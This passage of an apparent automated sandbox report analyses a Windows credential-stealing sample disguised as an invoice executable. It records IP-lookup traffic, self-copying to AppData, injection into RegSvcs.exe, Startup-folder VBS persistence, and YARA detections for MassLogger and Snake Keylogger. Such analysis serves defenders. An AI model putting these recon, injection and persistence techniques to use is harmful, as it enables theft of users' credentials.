Jan 8, 2025 12:31:55.202841997 CET	80	49704	132.226.247.73	192.168.2.11
Jan 8, 2025 12:31:55.202945948 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:32:19.092685938 CET	49702	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:32:19.097572088 CET	80	49702	132.226.247.73	192.168.2.11
Jan 8, 2025 12:32:30.217540979 CET	49704	80	192.168.2.11	132.226.247.73
Jan 8, 2025 12:32:30.222404003 CET	80	49704	132.226.247.73	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 12:30:37.168714046 CET	64672	53	192.168.2.11	1.1.1.1
Jan 8, 2025 12:30:37.175801039 CET	53	64672	1.1.1.1	192.168.2.11
Jan 8, 2025 12:30:39.091794014 CET	65001	53	192.168.2.11	1.1.1.1
Jan 8, 2025 12:30:39.098814964 CET	53	65001	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 12:30:37.168714046 CET	192.168.2.11	1.1.1.1	0xb845	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:39.091794014 CET	192.168.2.11	1.1.1.1	0xfab1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 12:30:37.175801039 CET	1.1.1.1	192.168.2.11	0xb845	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 12:30:37.175801039 CET	1.1.1.1	192.168.2.11	0xb845	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:37.175801039 CET	1.1.1.1	192.168.2.11	0xb845	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:37.175801039 CET	1.1.1.1	192.168.2.11	0xb845	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:37.175801039 CET	1.1.1.1	192.168.2.11	0xb845	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:37.175801039 CET	1.1.1.1	192.168.2.11	0xb845	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:39.098814964 CET	1.1.1.1	192.168.2.11	0xfab1	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:30:39.098814964 CET	1.1.1.1	192.168.2.11	0xfab1	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49702	132.226.247.73	80	7624	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:30:37.188189030 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 12:30:38.874869108 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 12:30:38.879465103 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 12:30:39.090188026 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49704	132.226.247.73	80	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:30:49.319269896 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 12:30:49.988763094 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 12:30:49.994328022 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 12:30:50.202946901 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49703	188.114.97.3	443	7624	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 11:30:39 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1650628 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8n%2FNgKSLzcQkyLig8CiTUNvvyw1tBQQA94OVCImVmPDb9liD%2BJheXv%2F7iEDsENYLMXPoyDBdvPdkHqiWjYXDP55tqkT5IKOOWd%2FIkDkqQsZ46QXXQ7LvsSXG5QhOqVS9MhO9Rah"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8febdb564f5a727d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10908&min_rtt=2087&rtt_var=6209&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1399137&cwnd=219&unsent_bytes=0&cid=ca4935143abecfeb&ts=188&x=0"
2025-01-08 11:30:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49705	188.114.97.3	443	7860	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:30:50 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 11:30:50 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 11:30:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1650639 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RS8qes4TK4JpPf4X9FegOeS8BOTNyNAm7YOfKasILfC0q8t5fXMg%2Bg%2F%2ByxNJJp7YRZ%2FJQ8MVcmEnit44N68XHHhbX5Xolbb6YgTvp0fJxMER0OyonbpJ9kPr88GAWassRuyvkpbt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8febdb9b7a42c3f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1467&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1897335&cwnd=190&unsent_bytes=0&cid=c23172dd5c2d87cf&ts=184&x=0"
2025-01-08 11:30:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	06:30:33
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\fatura098002.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fatura098002.exe"
Imagebase:	0x700000
File size:	721'408 bytes
MD5 hash:	D029E152DEE67016FF65AD19DBEED64B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:30:34
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Halitherses\gehlenite.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fatura098002.exe"
Imagebase:	0x640000
File size:	721'408 bytes
MD5 hash:	D029E152DEE67016FF65AD19DBEED64B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 55%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:30:35
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\fatura098002.exe"
Imagebase:	0x670000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2652141073.0000000000414000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2653936618.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:30:46
Start date:	08/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gehlenite.vbs"
Imagebase:	0x7ff75a5f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:30:47
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Halitherses\gehlenite.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"
Imagebase:	0x640000
File size:	721'408 bytes
MD5 hash:	D029E152DEE67016FF65AD19DBEED64B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:30:48
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"
Imagebase:	0x6c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2653419827.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	5.7%
Total number of Nodes:	1604
Total number of Limit Nodes:	33

Executed Functions

Function 007042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0070430D

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

GetCurrentProcess.KERNEL32(?,0079CB64,00000000,?,?), ref: 00704422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00704429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00704454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00704466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00704474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0070447B
GetSystemInfo.KERNEL32(?,?,?), ref: 007044A0

Strings

GetNativeSystemInfo, xrefs: 00704460
|O, xrefs: 007436F8
kernel32.dll, xrefs: 0070444F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3dc3df9369d6b79cd125b0b09b8d6ba3d8c8c287f54926dd494f63afe2d7a08d
Instruction ID: 1ba8edc32495ae1932a08227b69b63547d38cc6de3133663d0d9cf5cdc4304ee
Opcode Fuzzy Hash: 3dc3df9369d6b79cd125b0b09b8d6ba3d8c8c287f54926dd494f63afe2d7a08d
Instruction Fuzzy Hash: 94A196A190B3C0FFCB12C769BD811957FF5AB26340B98D59BE18593B62D23C4505CB2E

Function 00703170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0070316A,?,?), ref: 007031D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0070316A,?,?), ref: 00703204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00703227
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00703232
CreatePopupMenu.USER32 ref: 00703246
PostQuitMessage.USER32(00000000), ref: 00703267

Strings

TaskbarCreated, xrefs: 0070322D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 6c06a6b7cd9a8f5bae8e1f641f102d93984e8418bdcd5aa3aa54d8bd6f7ccee7
Instruction ID: 1d35d74cdbf6058ac79a1f25e85dcbea1277f05b101674796dfea7817679c5f4
Opcode Fuzzy Hash: 6c06a6b7cd9a8f5bae8e1f641f102d93984e8418bdcd5aa3aa54d8bd6f7ccee7
Instruction Fuzzy Hash: 22412635240204FBDF155BB89C2DB793BADFB09340F848327F902862E2C77D9A4297A5

Function 007042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007042B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007050AA,?,?,00000000,00000000), ref: 007042C9
LoadResource.KERNEL32(?,00000000,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20), ref: 007435BE
SizeofResource.KERNEL32(?,00000000,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20), ref: 007435D3
LockResource.KERNEL32(007050AA,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20,?), ref: 007435E6

Strings

SCRIPT, xrefs: 007042BF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: ac0b549b148f11757cb6b4b96f9f4c3b36635e77498994ac614e1a6a249d7538
Instruction ID: 599e75663fc5a70eab8b69dcf99917400b7ef431546d65845ddad17ccdf96237
Opcode Fuzzy Hash: ac0b549b148f11757cb6b4b96f9f4c3b36635e77498994ac614e1a6a249d7538
Instruction Fuzzy Hash: 71117CB1200700FFDF228B65DC49F277BB9FBC5B51F10826AB502D6290DB75D8018630

Function 00742BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00702B6B

Part of subcall function 00703A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007D1418,?,00702E7F,?,?,?,00000000), ref: 00703A78

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,007C2224), ref: 00742C10
ShellExecuteW.SHELL32(00000000,?,?,007C2224), ref: 00742C17

Strings

runas, xrefs: 00742C0B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 24cbe0a9adb5d61e3bc863156a6d2e3199563145e427660c1c1eb5d5fb5a2229
Instruction ID: 7a303786c9c27f9841ab62adc2cb0fe7734565264fc0b9abf49d0073d2f18e08
Opcode Fuzzy Hash: 24cbe0a9adb5d61e3bc863156a6d2e3199563145e427660c1c1eb5d5fb5a2229
Instruction Fuzzy Hash: 0F11B472208381EAC714FF60D89EA7EB7E89B91340F84562EF146521E3DF2D994AC712

Function 0070D730 Relevance: 21.6, APIs: 14, Instructions: 631sleepsynchronizationtimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0070D807
timeGetTime.WINMM ref: 0070DA07
Sleep.KERNEL32(0000000A), ref: 0070DBB1
Sleep.KERNEL32(0000000A), ref: 00752B76
GetExitCodeProcess.KERNEL32(?,?), ref: 00752C11
WaitForSingleObject.KERNEL32(?,00000000), ref: 00752C29
CloseHandle.KERNEL32(?), ref: 00752C3D
Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 00752CA9

Memory Dump Source

